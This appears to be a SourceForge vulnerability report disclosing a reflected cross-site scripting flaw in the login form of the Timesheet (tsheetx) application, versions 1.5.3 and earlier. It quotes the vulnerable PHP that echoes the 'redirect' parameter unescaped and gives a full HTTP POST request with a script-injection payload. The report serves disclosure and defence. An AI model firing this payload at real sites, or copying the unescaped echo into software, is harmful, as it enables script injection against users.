There's a cross-site scripting vulnerability in login form that allows an attacker to execute arbitrary HTML and JavaScript code via a "redirect" parameter.
Version: <=1.5.3
https://sourceforge.net/p/tsheetx/code/497/tree/branches/legacy/login.php#l40 https://sourceforge.net/p/tsheetx/code/497/tree/branches/legacy/login.php#l54
$redirect = isset($_REQUEST["redirect"]) ? $_REQUEST["redirect"] : ""; ?> <html> <head> <title>Timesheet Login</title> <?php include ("header.inc"); ?> </head> <body onLoad="document.loginForm.username.focus();"> <form action="login.php" method="POST" name="loginForm" style="margin: 0px;"> <input type="hidden" name="redirect" value="<?php echo $redirect; ?>" />
To reproduce:
POST /login.php HTTP/1.1 Host: localhost Content-Length: 108 Cache-Control: max-age=0 Origin: http://localhost Upgrade-Insecure-Requests: 1 DNT: 1 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: http://localhost/login.php Accept-Encoding: gzip, deflate Accept-Language: en-GB,en;q=0.9,en-US;q=0.8,fi;q=0.7 Connection: close redirect="/><script>alert("XSS")</script><input style="display:none&username=some&password=some&Login=submit
Log in to post a comment.
There's a cross-site scripting vulnerability in login form that allows an attacker to execute arbitrary HTML and JavaScript code via a "redirect" parameter.
Version: <=1.5.3
https://sourceforge.net/p/tsheetx/code/497/tree/branches/legacy/login.php#l40
https://sourceforge.net/p/tsheetx/code/497/tree/branches/legacy/login.php#l54
To reproduce: